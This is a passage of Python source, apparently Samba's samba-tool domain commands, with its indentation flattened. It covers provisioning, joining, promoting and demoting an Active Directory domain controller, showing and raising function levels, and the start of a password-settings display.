takes_options.extend(common_provision_join_options)
if samba.is_ntvfs_fileserver_built():
takes_options.extend(common_ntvfs_options)
takes_options.extend(ntvfs_options)
takes_args = []
def run(self, sambaopts=None, versionopts=None,
interactive=None,
domain=None,
domain_guid=None,
domain_sid=None,
ntds_guid=None,
invocationid=None,
host_name=None,
host_ip=None,
host_ip6=None,
adminpass=None,
site=None,
krbtgtpass=None,
machinepass=None,
dns_backend=None,
dns_forwarder=None,
dnspass=None,
ldapadminpass=None,
root=None,
nobody=None,
users=None,
quiet=None,
blank=None,
server_role=None,
function_level=None,
next_rid=None,
partitions_only=None,
targetdir=None,
use_xattrs="auto",
use_ntvfs=False,
use_rfc2307=None,
base_schema=None,
plaintext_secrets=False,
backend_store=None,
backend_store_size=None):
self.logger = self.get_logger(name="provision", quiet=quiet)
lp = sambaopts.get_loadparm()
smbconf = lp.configfile
if dns_forwarder is not None:
suggested_forwarder = dns_forwarder
else:
suggested_forwarder = self._get_nameserver_ip()
if suggested_forwarder is None:
suggested_forwarder = "none"
if len(self.raw_argv) == 1:
interactive = True
if interactive:
from getpass import getpass
import socket
def ask(prompt, default=None):
if default is not None:
print("%s [%s]: " % (prompt, default), end=' ')
else:
print("%s: " % (prompt,), end=' ')
sys.stdout.flush()
return sys.stdin.readline().rstrip("\n") or default
try:
default = socket.getfqdn().split(".", 1)[1].upper()
except IndexError:
default = None
realm = ask("Realm", default)
if realm in (None, ""):
raise CommandError("No realm set!")
try:
default = realm.split(".")[0]
except IndexError:
default = None
domain = ask("Domain", default)
if domain is None:
raise CommandError("No domain set!")
server_role = ask("Server Role (dc, member, standalone)", "dc")
dns_backend = ask("DNS backend (SAMBA_INTERNAL, BIND9_FLATFILE, BIND9_DLZ, NONE)", "SAMBA_INTERNAL")
if dns_backend in (None, ''):
raise CommandError("No DNS backend set!")
if dns_backend == "SAMBA_INTERNAL":
dns_forwarder = ask("DNS forwarder IP address (write 'none' to disable forwarding)", suggested_forwarder)
if dns_forwarder.lower() in (None, 'none'):
suggested_forwarder = None
dns_forwarder = None
while True:
adminpassplain = getpass("Administrator password: ")
issue = self._adminpass_issue(adminpassplain)
if issue:
self.errf.write("%s.\n" % issue)
else:
adminpassverify = getpass("Retype password: ")
if not adminpassplain == adminpassverify:
self.errf.write("Sorry, passwords do not match.\n")
else:
adminpass = adminpassplain
break
else:
realm = sambaopts._lp.get('realm')
if realm is None:
raise CommandError("No realm set!")
if domain is None:
raise CommandError("No domain set!")
if adminpass:
issue = self._adminpass_issue(adminpass)
if issue:
raise CommandError(issue)
else:
self.logger.info("Administrator password will be set randomly!")
if function_level == "2000":
dom_for_fun_level = DS_DOMAIN_FUNCTION_2000
elif function_level == "2003":
dom_for_fun_level = DS_DOMAIN_FUNCTION_2003
elif function_level == "2008":
dom_for_fun_level = DS_DOMAIN_FUNCTION_2008
elif function_level == "2008_R2":
dom_for_fun_level = DS_DOMAIN_FUNCTION_2008_R2
if dns_backend == "SAMBA_INTERNAL" and dns_forwarder is None:
dns_forwarder = suggested_forwarder
samdb_fill = FILL_FULL
if blank:
samdb_fill = FILL_NT4SYNC
elif partitions_only:
samdb_fill = FILL_DRS
if targetdir is not None:
if not os.path.isdir(targetdir):
os.mkdir(targetdir)
eadb = True
if use_xattrs == "yes":
eadb = False
elif use_xattrs == "auto" and use_ntvfs == False:
eadb = False
elif use_ntvfs == False:
raise CommandError("--use-xattrs=no requires --use-ntvfs (not supported for production use). "
"Please re-run with --use-xattrs omitted.")
elif use_xattrs == "auto" and not lp.get("posix:eadb"):
if targetdir:
file = tempfile.NamedTemporaryFile(dir=os.path.abspath(targetdir))
else:
file = tempfile.NamedTemporaryFile(dir=os.path.abspath(os.path.dirname(lp.get("private dir"))))
try:
try:
samba.ntacls.setntacl(lp, file.name,
"O:S-1-5-32G:S-1-5-32",
"S-1-5-32",
system_session_unix(),
"native")
eadb = False
except Exception:
self.logger.info("You are not root or your system does not support xattr, using tdb backend for attributes. ")
finally:
file.close()
if eadb:
self.logger.info("not using extended attributes to store ACLs and other metadata. If you intend to use this provision in production, rerun the script as root on a system supporting xattrs.")
if domain_sid is not None:
domain_sid = security.dom_sid(domain_sid)
session = system_session()
if backend_store is None:
backend_store = get_default_backend_store()
try:
result = provision(self.logger,
session, smbconf=smbconf, targetdir=targetdir,
samdb_fill=samdb_fill, realm=realm, domain=domain,
domainguid=domain_guid, domainsid=domain_sid,
hostname=host_name,
hostip=host_ip, hostip6=host_ip6,
sitename=site, ntdsguid=ntds_guid,
invocationid=invocationid, adminpass=adminpass,
krbtgtpass=krbtgtpass, machinepass=machinepass,
dns_backend=dns_backend, dns_forwarder=dns_forwarder,
dnspass=dnspass, root=root, nobody=nobody,
users=users,
serverrole=server_role, dom_for_fun_level=dom_for_fun_level,
useeadb=eadb, next_rid=next_rid, lp=lp, use_ntvfs=use_ntvfs,
use_rfc2307=use_rfc2307, skip_sysvolacl=False,
base_schema=base_schema,
plaintext_secrets=plaintext_secrets,
backend_store=backend_store,
backend_store_size=backend_store_size)
except ProvisioningError as e:
raise CommandError("Provision failed", e)
result.report_logger(self.logger)
def _get_nameserver_ip(self):
"""Grab the nameserver IP address from /etc/resolv.conf."""
from os import path
RESOLV_CONF = "/etc/resolv.conf"
if not path.isfile(RESOLV_CONF):
self.logger.warning("Failed to locate %s" % RESOLV_CONF)
return None
handle = None
try:
handle = open(RESOLV_CONF, 'r')
for line in handle:
if not line.startswith('nameserver'):
continue
# we want the last non-space continuous string of the line
return line.strip().split()[-1]
finally:
if handle is not None:
handle.close()
self.logger.warning("No nameserver found in %s" % RESOLV_CONF)
def _adminpass_issue(self, adminpass):
"""Returns error string for a bad administrator password,
or None if acceptable"""
if isinstance(adminpass, bytes):
adminpass = adminpass.decode('utf8')
if len(adminpass) < DEFAULT_MIN_PWD_LENGTH:
return "Administrator password does not meet the default minimum" \
" password length requirement (%d characters)" \
% DEFAULT_MIN_PWD_LENGTH
elif not samba.check_password_quality(adminpass):
return "Administrator password does not meet the default" \
" quality standards"
else:
return None
class cmd_domain_dcpromo(Command):
"""Promote an existing domain member or NT4 PDC to an AD DC."""
synopsis = "%prog <dnsdomain> [DC|RODC] [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions,
"credopts": options.CredentialsOptions,
}
takes_options = []
takes_options.extend(common_join_options)
takes_options.extend(common_provision_join_options)
if samba.is_ntvfs_fileserver_built():
takes_options.extend(common_ntvfs_options)
takes_args = ["domain", "role?"]
def run(self, domain, role=None, sambaopts=None, credopts=None,
versionopts=None, server=None, site=None, targetdir=None,
domain_critical_only=False, machinepass=None,
use_ntvfs=False, dns_backend=None,
quiet=False, verbose=False, plaintext_secrets=False,
backend_store=None, backend_store_size=None):
lp = sambaopts.get_loadparm()
creds = credopts.get_credentials(lp)
net = Net(creds, lp, server=credopts.ipaddress)
logger = self.get_logger(verbose=verbose, quiet=quiet)
netbios_name = lp.get("netbios name")
if role is not None:
role = role.upper()
if role == "DC":
join_DC(logger=logger, server=server, creds=creds, lp=lp, domain=domain,
site=site, netbios_name=netbios_name, targetdir=targetdir,
domain_critical_only=domain_critical_only,
machinepass=machinepass, use_ntvfs=use_ntvfs,
dns_backend=dns_backend,
promote_existing=True, plaintext_secrets=plaintext_secrets,
backend_store=backend_store,
backend_store_size=backend_store_size)
elif role == "RODC":
join_RODC(logger=logger, server=server, creds=creds, lp=lp, domain=domain,
site=site, netbios_name=netbios_name, targetdir=targetdir,
domain_critical_only=domain_critical_only,
machinepass=machinepass, use_ntvfs=use_ntvfs, dns_backend=dns_backend,
promote_existing=True, plaintext_secrets=plaintext_secrets,
backend_store=backend_store,
backend_store_size=backend_store_size)
else:
raise CommandError("Invalid role '%s' (possible values: DC, RODC)" % role)
class cmd_domain_join(Command):
"""Join domain as either member or backup domain controller."""
synopsis = "%prog <dnsdomain> [DC|RODC|MEMBER] [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions,
"credopts": options.CredentialsOptions,
}
ntvfs_options = [
Option(
"--use-ntvfs", help="Use NTVFS for the fileserver (default = no)",
action="store_true")
]
takes_options = []
takes_options.extend(common_join_options)
takes_options.extend(common_provision_join_options)
if samba.is_ntvfs_fileserver_built():
takes_options.extend(ntvfs_options)
takes_args = ["domain", "role?"]
def run(self, domain, role=None, sambaopts=None, credopts=None,
versionopts=None, server=None, site=None, targetdir=None,
domain_critical_only=False, machinepass=None,
use_ntvfs=False, dns_backend=None,
quiet=False, verbose=False,
plaintext_secrets=False,
backend_store=None, backend_store_size=None):
lp = sambaopts.get_loadparm()
creds = credopts.get_credentials(lp)
net = Net(creds, lp, server=credopts.ipaddress)
logger = self.get_logger(verbose=verbose, quiet=quiet)
netbios_name = lp.get("netbios name")
if role is not None:
role = role.upper()
if role is None or role == "MEMBER":
(join_password, sid, domain_name) = net.join_member(
domain, netbios_name, LIBNET_JOIN_AUTOMATIC,
machinepass=machinepass)
self.errf.write("Joined domain %s (%s)\n" % (domain_name, sid))
elif role == "DC":
join_DC(logger=logger, server=server, creds=creds, lp=lp, domain=domain,
site=site, netbios_name=netbios_name, targetdir=targetdir,
domain_critical_only=domain_critical_only,
machinepass=machinepass, use_ntvfs=use_ntvfs,
dns_backend=dns_backend,
plaintext_secrets=plaintext_secrets,
backend_store=backend_store,
backend_store_size=backend_store_size)
elif role == "RODC":
join_RODC(logger=logger, server=server, creds=creds, lp=lp, domain=domain,
site=site, netbios_name=netbios_name, targetdir=targetdir,
domain_critical_only=domain_critical_only,
machinepass=machinepass, use_ntvfs=use_ntvfs,
dns_backend=dns_backend,
plaintext_secrets=plaintext_secrets,
backend_store=backend_store,
backend_store_size=backend_store_size)
else:
raise CommandError("Invalid role '%s' (possible values: MEMBER, DC, RODC)" % role)
class cmd_domain_demote(Command):
"""Demote ourselves from the role of Domain Controller."""
synopsis = "%prog [options]"
takes_options = [
Option("--server", help="writable DC to write demotion changes on", type=str),
Option("-H", "--URL", help="LDB URL for database or target server", type=str,
metavar="URL", dest="H"),
Option("--remove-other-dead-server", help="Dead DC (name or NTDS GUID) "
"to remove ALL references to (rather than this DC)", type=str),
Option("-q", "--quiet", help="Be quiet", action="store_true"),
Option("-v", "--verbose", help="Be verbose", action="store_true"),
]
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"credopts": options.CredentialsOptions,
"versionopts": options.VersionOptions,
}
def run(self, sambaopts=None, credopts=None,
versionopts=None, server=None,
remove_other_dead_server=None, H=None,
verbose=False, quiet=False):
lp = sambaopts.get_loadparm()
creds = credopts.get_credentials(lp)
net = Net(creds, lp, server=credopts.ipaddress)
logger = self.get_logger(verbose=verbose, quiet=quiet)
if remove_other_dead_server is not None:
if server is not None:
samdb = SamDB(url="ldap://%s" % server,
session_info=system_session(),
credentials=creds, lp=lp)
else:
samdb = SamDB(url=H, session_info=system_session(), credentials=creds, lp=lp)
try:
remove_dc.remove_dc(samdb, logger, remove_other_dead_server)
except remove_dc.DemoteException as err:
raise CommandError("Demote failed: %s" % err)
return
netbios_name = lp.get("netbios name")
samdb = SamDB(url=H, session_info=system_session(), credentials=creds, lp=lp)
if not server:
res = samdb.search(expression='(&(objectClass=computer)(serverReferenceBL=*))', attrs=["dnsHostName", "name"])
if (len(res) == 0):
raise CommandError("Unable to search for servers")
if (len(res) == 1):
raise CommandError("You are the last server in the domain")
server = None
for e in res:
if str(e["name"]).lower() != netbios_name.lower():
server = e["dnsHostName"]
break
ntds_guid = samdb.get_ntds_GUID()
msg = samdb.search(base=str(samdb.get_config_basedn()),
scope=ldb.SCOPE_SUBTREE, expression="(objectGUID=%s)" % ntds_guid,
attrs=['options'])
if len(msg) == 0 or "options" not in msg[0]:
raise CommandError("Failed to find options on %s" % ntds_guid)
ntds_dn = msg[0].dn
dsa_options = int(str(msg[0]['options']))
res = samdb.search(expression="(fSMORoleOwner=%s)" % str(ntds_dn),
controls=["search_options:1:2"])
if len(res) != 0:
raise CommandError("Current DC is still the owner of %d role(s), "
"use the role command to transfer roles to "
"another DC" %
len(res))
self.errf.write("Using %s as partner server for the demotion\n" %
server)
(drsuapiBind, drsuapi_handle, supportedExtensions) = drsuapi_connect(server, lp, creds)
self.errf.write("Deactivating inbound replication\n")
nmsg = ldb.Message()
nmsg.dn = msg[0].dn
if not (dsa_options & DS_NTDSDSA_OPT_DISABLE_OUTBOUND_REPL) and not samdb.am_rodc():
dsa_options |= DS_NTDSDSA_OPT_DISABLE_INBOUND_REPL
nmsg["options"] = ldb.MessageElement(str(dsa_options), ldb.FLAG_MOD_REPLACE, "options")
samdb.modify(nmsg)
self.errf.write("Asking partner server %s to synchronize from us\n"
% server)
for part in (samdb.get_schema_basedn(),
samdb.get_config_basedn(),
samdb.get_root_basedn()):
nc = drsuapi.DsReplicaObjectIdentifier()
nc.dn = str(part)
req1 = drsuapi.DsReplicaSyncRequest1()
req1.naming_context = nc
req1.options = drsuapi.DRSUAPI_DRS_WRIT_REP
req1.source_dsa_guid = misc.GUID(ntds_guid)
try:
drsuapiBind.DsReplicaSync(drsuapi_handle, 1, req1)
except RuntimeError as e1:
(werr, string) = e1.args
if werr == werror.WERR_DS_DRA_NO_REPLICA:
pass
else:
self.errf.write(
"Error while replicating out last local changes from '%s' for demotion, "
"re-enabling inbound replication\n" % part)
dsa_options ^= DS_NTDSDSA_OPT_DISABLE_INBOUND_REPL
nmsg["options"] = ldb.MessageElement(str(dsa_options), ldb.FLAG_MOD_REPLACE, "options")
samdb.modify(nmsg)
raise CommandError("Error while sending a DsReplicaSync for partition '%s'" % str(part), string)
try:
remote_samdb = SamDB(url="ldap://%s" % server,
session_info=system_session(),
credentials=creds, lp=lp)
self.errf.write("Changing userControl and container\n")
res = remote_samdb.search(base=str(remote_samdb.domain_dn()),
expression="(&(objectClass=user)(sAMAccountName=%s$))" %
netbios_name.upper(),
attrs=["userAccountControl"])
dc_dn = res[0].dn
uac = int(str(res[0]["userAccountControl"]))
except Exception as e:
if not (dsa_options & DS_NTDSDSA_OPT_DISABLE_OUTBOUND_REPL) and not samdb.am_rodc():
self.errf.write(
"Error while demoting, re-enabling inbound replication\n")
dsa_options ^= DS_NTDSDSA_OPT_DISABLE_INBOUND_REPL
nmsg["options"] = ldb.MessageElement(str(dsa_options), ldb.FLAG_MOD_REPLACE, "options")
samdb.modify(nmsg)
raise CommandError("Error while changing account control", e)
if (len(res) != 1):
if not (dsa_options & DS_NTDSDSA_OPT_DISABLE_OUTBOUND_REPL) and not samdb.am_rodc():
self.errf.write(
"Error while demoting, re-enabling inbound replication")
dsa_options ^= DS_NTDSDSA_OPT_DISABLE_INBOUND_REPL
nmsg["options"] = ldb.MessageElement(str(dsa_options), ldb.FLAG_MOD_REPLACE, "options")
samdb.modify(nmsg)
raise CommandError("Unable to find object with samaccountName = %s$"
" in the remote dc" % netbios_name.upper())
olduac = uac
uac &= ~(UF_SERVER_TRUST_ACCOUNT |
UF_TRUSTED_FOR_DELEGATION |
UF_PARTIAL_SECRETS_ACCOUNT)
uac |= UF_WORKSTATION_TRUST_ACCOUNT
msg = ldb.Message()
msg.dn = dc_dn
msg["userAccountControl"] = ldb.MessageElement("%d" % uac,
ldb.FLAG_MOD_REPLACE,
"userAccountControl")
try:
remote_samdb.modify(msg)
except Exception as e:
if not (dsa_options & DS_NTDSDSA_OPT_DISABLE_OUTBOUND_REPL) and not samdb.am_rodc():
self.errf.write(
"Error while demoting, re-enabling inbound replication")
dsa_options ^= DS_NTDSDSA_OPT_DISABLE_INBOUND_REPL
nmsg["options"] = ldb.MessageElement(str(dsa_options), ldb.FLAG_MOD_REPLACE, "options")
samdb.modify(nmsg)
raise CommandError("Error while changing account control", e)
parent = msg.dn.parent()
dc_name = res[0].dn.get_rdn_value()
rdn = "CN=%s" % dc_name
# Let's move to the Computer container
i = 0
newrdn = str(rdn)
computer_dn = ldb.Dn(remote_samdb, "CN=Computers,%s" % str(remote_samdb.domain_dn()))
res = remote_samdb.search(base=computer_dn, expression=rdn, scope=ldb.SCOPE_ONELEVEL)
if (len(res) != 0):
res = remote_samdb.search(base=computer_dn, expression="%s-%d" % (rdn, i),
scope=ldb.SCOPE_ONELEVEL)
while(len(res) != 0 and i < 100):
i = i + 1
res = remote_samdb.search(base=computer_dn, expression="%s-%d" % (rdn, i),
scope=ldb.SCOPE_ONELEVEL)
if i == 100:
if not (dsa_options & DS_NTDSDSA_OPT_DISABLE_OUTBOUND_REPL) and not samdb.am_rodc():
self.errf.write(
"Error while demoting, re-enabling inbound replication\n")
dsa_options ^= DS_NTDSDSA_OPT_DISABLE_INBOUND_REPL
nmsg["options"] = ldb.MessageElement(str(dsa_options), ldb.FLAG_MOD_REPLACE, "options")
samdb.modify(nmsg)
msg = ldb.Message()
msg.dn = dc_dn
msg["userAccountControl"] = ldb.MessageElement("%d" % uac,
ldb.FLAG_MOD_REPLACE,
"userAccountControl")
remote_samdb.modify(msg)
raise CommandError("Unable to find a slot for renaming %s,"
" all names from %s-1 to %s-%d seemed used" %
(str(dc_dn), rdn, rdn, i - 9))
newrdn = "%s-%d" % (rdn, i)
try:
newdn = ldb.Dn(remote_samdb, "%s,%s" % (newrdn, str(computer_dn)))
remote_samdb.rename(dc_dn, newdn)
except Exception as e:
if not (dsa_options & DS_NTDSDSA_OPT_DISABLE_OUTBOUND_REPL) and not samdb.am_rodc():
self.errf.write(
"Error while demoting, re-enabling inbound replication\n")
dsa_options ^= DS_NTDSDSA_OPT_DISABLE_INBOUND_REPL
nmsg["options"] = ldb.MessageElement(str(dsa_options), ldb.FLAG_MOD_REPLACE, "options")
samdb.modify(nmsg)
msg = ldb.Message()
msg.dn = dc_dn
msg["userAccountControl"] = ldb.MessageElement("%d" % uac,
ldb.FLAG_MOD_REPLACE,
"userAccountControl")
remote_samdb.modify(msg)
raise CommandError("Error while renaming %s to %s" % (str(dc_dn), str(newdn)), e)
server_dsa_dn = samdb.get_serverName()
domain = remote_samdb.get_root_basedn()
try:
req1 = drsuapi.DsRemoveDSServerRequest1()
req1.server_dn = str(server_dsa_dn)
req1.domain_dn = str(domain)
req1.commit = 1
drsuapiBind.DsRemoveDSServer(drsuapi_handle, 1, req1)
except RuntimeError as e3:
(werr, string) = e3.args
if not (dsa_options & DS_NTDSDSA_OPT_DISABLE_OUTBOUND_REPL) and not samdb.am_rodc():
self.errf.write(
"Error while demoting, re-enabling inbound replication\n")
dsa_options ^= DS_NTDSDSA_OPT_DISABLE_INBOUND_REPL
nmsg["options"] = ldb.MessageElement(str(dsa_options), ldb.FLAG_MOD_REPLACE, "options")
samdb.modify(nmsg)
msg = ldb.Message()
msg.dn = newdn
msg["userAccountControl"] = ldb.MessageElement("%d" % uac,
ldb.FLAG_MOD_REPLACE,
"userAccountControl")
remote_samdb.modify(msg)
remote_samdb.rename(newdn, dc_dn)
if werr == werror.WERR_DS_DRA_NO_REPLICA:
raise CommandError("The DC %s is not present on (already "
"removed from) the remote server: %s" %
(server_dsa_dn, e3))
else:
raise CommandError("Error while sending a removeDsServer "
"of %s: %s" %
(server_dsa_dn, e3))
remove_dc.remove_sysvol_references(remote_samdb, logger, dc_name)
# These are objects under the computer account that should be deleted
for s in ("CN=Enterprise,CN=NTFRS Subscriptions",
"CN=%s, CN=NTFRS Subscriptions" % lp.get("realm"),
"CN=Domain system Volumes (SYSVOL Share), CN=NTFRS Subscriptions",
"CN=NTFRS Subscriptions"):
try:
remote_samdb.delete(ldb.Dn(remote_samdb,
"%s,%s" % (s, str(newdn))))
except ldb.LdbError as l:
pass
# get dns host name for target server to demote, remove dns references
remove_dc.remove_dns_references(remote_samdb, logger, samdb.host_dns_name(),
ignore_no_name=True)
self.errf.write("Demote successful\n")
class cmd_domain_level(Command):
"""Raise domain and forest function levels."""
synopsis = "%prog (show|raise <options>) [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"credopts": options.CredentialsOptions,
"versionopts": options.VersionOptions,
}
takes_options = [
Option("-H", "--URL", help="LDB URL for database or target server", type=str,
metavar="URL", dest="H"),
Option("-q", "--quiet", help="Be quiet", action="store_true"), # unused
Option("--forest-level", type="choice", choices=["2003", "2008", "2008_R2", "2012", "2012_R2"],
help="The forest function level (2003 | 2008 | 2008_R2 | 2012 | 2012_R2)"),
Option("--domain-level", type="choice", choices=["2003", "2008", "2008_R2", "2012", "2012_R2"],
help="The domain function level (2003 | 2008 | 2008_R2 | 2012 | 2012_R2)")
]
takes_args = ["subcommand"]
def run(self, subcommand, H=None, forest_level=None, domain_level=None,
quiet=False, credopts=None, sambaopts=None, versionopts=None):
lp = sambaopts.get_loadparm()
creds = credopts.get_credentials(lp, fallback_machine=True)
samdb = SamDB(url=H, session_info=system_session(),
credentials=creds, lp=lp)
domain_dn = samdb.domain_dn()
res_forest = samdb.search("CN=Partitions,%s" % samdb.get_config_basedn(),
scope=ldb.SCOPE_BASE, attrs=["msDS-Behavior-Version"])
assert len(res_forest) == 1
res_domain = samdb.search(domain_dn, scope=ldb.SCOPE_BASE,
attrs=["msDS-Behavior-Version", "nTMixedDomain"])
assert len(res_domain) == 1
res_dc_s = samdb.search("CN=Sites,%s" % samdb.get_config_basedn(),
scope=ldb.SCOPE_SUBTREE, expression="(objectClass=nTDSDSA)",
attrs=["msDS-Behavior-Version"])
assert len(res_dc_s) >= 1
# default values, since "msDS-Behavior-Version" does not exist on Windows 2000 AD
level_forest = DS_DOMAIN_FUNCTION_2000
level_domain = DS_DOMAIN_FUNCTION_2000
if "msDS-Behavior-Version" in res_forest[0]:
level_forest = int(res_forest[0]["msDS-Behavior-Version"][0])
if "msDS-Behavior-Version" in res_domain[0]:
level_domain = int(res_domain[0]["msDS-Behavior-Version"][0])
level_domain_mixed = int(res_domain[0]["nTMixedDomain"][0])
min_level_dc = None
for msg in res_dc_s:
if "msDS-Behavior-Version" in msg:
if min_level_dc is None or int(msg["msDS-Behavior-Version"][0]) < min_level_dc:
min_level_dc = int(msg["msDS-Behavior-Version"][0])
else:
min_level_dc = DS_DOMAIN_FUNCTION_2000
# well, this is the least
break
if level_forest < DS_DOMAIN_FUNCTION_2000 or level_domain < DS_DOMAIN_FUNCTION_2000:
raise CommandError("Domain and/or forest function level(s) is/are invalid. Correct them or reprovision!")
if min_level_dc < DS_DOMAIN_FUNCTION_2000:
raise CommandError("Lowest function level of a DC is invalid. Correct this or reprovision!")
if level_forest > level_domain:
raise CommandError("Forest function level is higher than the domain level(s). Correct this or reprovision!")
if level_domain > min_level_dc:
raise CommandError("Domain function level is higher than the lowest function level of a DC. Correct this or reprovision!")
if subcommand == "show":
self.message("Domain and forest function level for domain '%s'" % domain_dn)
if level_forest == DS_DOMAIN_FUNCTION_2000 and level_domain_mixed != 0:
self.message("\nATTENTION: You run SAMBA 4 on a forest function level lower than Windows 2000 (Native). This isn't supported! Please raise!")
if level_domain == DS_DOMAIN_FUNCTION_2000 and level_domain_mixed != 0:
self.message("\nATTENTION: You run SAMBA 4 on a domain function level lower than Windows 2000 (Native). This isn't supported! Please raise!")
if min_level_dc == DS_DOMAIN_FUNCTION_2000 and level_domain_mixed != 0:
self.message("\nATTENTION: You run SAMBA 4 on a lowest function level of a DC lower than Windows 2003. This isn't supported! Please step-up or upgrade the concerning DC(s)!")
self.message("")
if level_forest == DS_DOMAIN_FUNCTION_2000:
outstr = "2000"
elif level_forest == DS_DOMAIN_FUNCTION_2003_MIXED:
outstr = "2003 with mixed domains/interim (NT4 DC support)"
elif level_forest == DS_DOMAIN_FUNCTION_2003:
outstr = "2003"
elif level_forest == DS_DOMAIN_FUNCTION_2008:
outstr = "2008"
elif level_forest == DS_DOMAIN_FUNCTION_2008_R2:
outstr = "2008 R2"
elif level_forest == DS_DOMAIN_FUNCTION_2012:
outstr = "2012"
elif level_forest == DS_DOMAIN_FUNCTION_2012_R2:
outstr = "2012 R2"
else:
outstr = "higher than 2012 R2"
self.message("Forest function level: (Windows) " + outstr)
if level_domain == DS_DOMAIN_FUNCTION_2000 and level_domain_mixed != 0:
outstr = "2000 mixed (NT4 DC support)"
elif level_domain == DS_DOMAIN_FUNCTION_2000 and level_domain_mixed == 0:
outstr = "2000"
elif level_domain == DS_DOMAIN_FUNCTION_2003_MIXED:
outstr = "2003 with mixed domains/interim (NT4 DC support)"
elif level_domain == DS_DOMAIN_FUNCTION_2003:
outstr = "2003"
elif level_domain == DS_DOMAIN_FUNCTION_2008:
outstr = "2008"
elif level_domain == DS_DOMAIN_FUNCTION_2008_R2:
outstr = "2008 R2"
elif level_domain == DS_DOMAIN_FUNCTION_2012:
outstr = "2012"
elif level_domain == DS_DOMAIN_FUNCTION_2012_R2:
outstr = "2012 R2"
else:
outstr = "higher than 2012 R2"
self.message("Domain function level: (Windows) " + outstr)
if min_level_dc == DS_DOMAIN_FUNCTION_2000:
outstr = "2000"
elif min_level_dc == DS_DOMAIN_FUNCTION_2003:
outstr = "2003"
elif min_level_dc == DS_DOMAIN_FUNCTION_2008:
outstr = "2008"
elif min_level_dc == DS_DOMAIN_FUNCTION_2008_R2:
outstr = "2008 R2"
elif min_level_dc == DS_DOMAIN_FUNCTION_2012:
outstr = "2012"
elif min_level_dc == DS_DOMAIN_FUNCTION_2012_R2:
outstr = "2012 R2"
else:
outstr = "higher than 2012 R2"
self.message("Lowest function level of a DC: (Windows) " + outstr)
elif subcommand == "raise":
msgs = []
if domain_level is not None:
if domain_level == "2003":
new_level_domain = DS_DOMAIN_FUNCTION_2003
elif domain_level == "2008":
new_level_domain = DS_DOMAIN_FUNCTION_2008
elif domain_level == "2008_R2":
new_level_domain = DS_DOMAIN_FUNCTION_2008_R2
elif domain_level == "2012":
new_level_domain = DS_DOMAIN_FUNCTION_2012
elif domain_level == "2012_R2":
new_level_domain = DS_DOMAIN_FUNCTION_2012_R2
if new_level_domain <= level_domain and level_domain_mixed == 0:
raise CommandError("Domain function level can't be smaller than or equal to the actual one!")
if new_level_domain > min_level_dc:
raise CommandError("Domain function level can't be higher than the lowest function level of a DC!")
# Deactivate mixed/interim domain support
if level_domain_mixed != 0:
# Directly on the base DN
m = ldb.Message()
m.dn = ldb.Dn(samdb, domain_dn)
m["nTMixedDomain"] = ldb.MessageElement("0",
ldb.FLAG_MOD_REPLACE, "nTMixedDomain")
samdb.modify(m)
# Under partitions
m = ldb.Message()
m.dn = ldb.Dn(samdb, "CN=" + lp.get("workgroup") + ",CN=Partitions,%s" % samdb.get_config_basedn())
m["nTMixedDomain"] = ldb.MessageElement("0",
ldb.FLAG_MOD_REPLACE, "nTMixedDomain")
try:
samdb.modify(m)
except ldb.LdbError as e:
(enum, emsg) = e.args
if enum != ldb.ERR_UNWILLING_TO_PERFORM:
raise
# Directly on the base DN
m = ldb.Message()
m.dn = ldb.Dn(samdb, domain_dn)
m["msDS-Behavior-Version"] = ldb.MessageElement(
str(new_level_domain), ldb.FLAG_MOD_REPLACE,
"msDS-Behavior-Version")
samdb.modify(m)
# Under partitions
m = ldb.Message()
m.dn = ldb.Dn(samdb, "CN=" + lp.get("workgroup")
+ ",CN=Partitions,%s" % samdb.get_config_basedn())
m["msDS-Behavior-Version"] = ldb.MessageElement(
str(new_level_domain), ldb.FLAG_MOD_REPLACE,
"msDS-Behavior-Version")
try:
samdb.modify(m)
except ldb.LdbError as e2:
(enum, emsg) = e2.args
if enum != ldb.ERR_UNWILLING_TO_PERFORM:
raise
level_domain = new_level_domain
msgs.append("Domain function level changed!")
if forest_level is not None:
if forest_level == "2003":
new_level_forest = DS_DOMAIN_FUNCTION_2003
elif forest_level == "2008":
new_level_forest = DS_DOMAIN_FUNCTION_2008
elif forest_level == "2008_R2":
new_level_forest = DS_DOMAIN_FUNCTION_2008_R2
elif forest_level == "2012":
new_level_forest = DS_DOMAIN_FUNCTION_2012
elif forest_level == "2012_R2":
new_level_forest = DS_DOMAIN_FUNCTION_2012_R2
if new_level_forest <= level_forest:
raise CommandError("Forest function level can't be smaller than or equal to the actual one!")
if new_level_forest > level_domain:
raise CommandError("Forest function level can't be higher than the domain function level(s). Please raise it/them first!")
m = ldb.Message()
m.dn = ldb.Dn(samdb, "CN=Partitions,%s" % samdb.get_config_basedn())
m["msDS-Behavior-Version"] = ldb.MessageElement(
str(new_level_forest), ldb.FLAG_MOD_REPLACE,
"msDS-Behavior-Version")
samdb.modify(m)
msgs.append("Forest function level changed!")
msgs.append("All changes applied successfully!")
self.message("\n".join(msgs))
else:
raise CommandError("invalid argument: '%s' (choose from 'show', 'raise')" % subcommand)
# In MS AD, setting a timeout to '(never)' corresponds to this value
NEVER_TIMESTAMP = int(-0x8000000000000000)
def timestamp_to_mins(timestamp_str):
"""Converts a timestamp in -100 nanosecond units to minutes"""
# treat a timestamp of 'never' the same as zero (this should work OK for
# most settings, and it displays better than trying to convert
# -0x8000000000000000 to minutes)
if int(timestamp_str) == NEVER_TIMESTAMP:
return 0
else:
return abs(int(timestamp_str)) / (1e7 * 60)
def timestamp_to_days(timestamp_str):
"""Converts a timestamp in -100 nanosecond units to days"""
return timestamp_to_mins(timestamp_str) / (60 * 24)
class cmd_domain_passwordsettings_show(Command):
"""Display current password settings for the domain."""
synopsis = "%prog [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions,
"credopts": options.CredentialsOptions,
}
takes_options = [
Option("-H", "--URL", help="LDB URL for database or target server", type=str,
metavar="URL", dest="H"),
]
def run(self, H=None, credopts=None, sambaopts=None, versionopts=None):
lp = sambaopts.get_loadparm()
creds = credopts.get_credentials(lp)
samdb = SamDB(url=H, session_info=system_session(),
credentials=creds, lp=lp)
domain_dn = samdb.domain_dn()
res = samdb.search(domain_dn, scope=ldb.SCOPE_BASE,
attrs=["pwdProperties", "pwdHistoryLength", "minPwdLength",
